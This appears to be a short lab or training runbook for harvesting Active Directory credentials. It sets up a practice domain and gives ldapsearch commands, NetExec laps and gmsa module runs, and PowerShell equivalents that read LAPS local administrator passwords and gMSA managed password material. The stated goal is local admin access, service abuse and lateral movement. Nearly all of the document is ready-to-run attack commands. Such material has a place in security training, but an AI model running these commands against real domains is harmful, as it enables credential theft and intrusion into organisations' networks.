LAPS and gMSA secrets are exposed through LDAP attributes when the current principal has read rights. We query these attributes directly and then validate whether the recovered credential material enables local admin, service abuse, or lateral movement.
export DC=10.10.10.200
export BASE='DC=ootw,DC=local'
export DOMAIN=ootw.local
export USER='student'
export PASS='student'
Query legacy Microsoft LAPS passwords if the current principal has read rights.
LDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(ms-Mcs-AdmPwd=*)' dNSHostName ms-Mcs-AdmPwd ms-Mcs-AdmPwdExpirationTime
Query Windows LAPS password blobs if the current principal has read rights.
LDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(msLAPS-Password=*)' dNSHostName msLAPS-Password msLAPS-PasswordExpirationTime
Find gMSA accounts and read managed password material if delegated.
LDAPTLS_REQCERT=never ldapsearch -LLL -x -H ldaps://$DC:636 -D "$DOMAIN\\$USER" -w "$PASS" -b "$BASE" '(objectClass=msDS-GroupManagedServiceAccount)' sAMAccountName distinguishedName msDS-GroupMSAMembership msDS-ManagedPassword
Use NetExec modules for LAPS and gMSA checks.
nxc ldap $DC -d OOTW -u $USER -p "$PASS" -M laps
nxc ldap $DC -d OOTW -u $USER -p "$PASS" -M gmsa
Windows-side equivalent.
Get-ADComputer -LDAPFilter '(ms-Mcs-AdmPwd=*)' -Properties 'ms-Mcs-AdmPwd','ms-Mcs-AdmPwdExpirationTime',dNSHostName |
Select-Object dNSHostName,'ms-Mcs-AdmPwd','ms-Mcs-AdmPwdExpirationTime'
Get-ADServiceAccount -Filter * -Properties msDS-GroupMSAMembership,msDS-ManagedPassword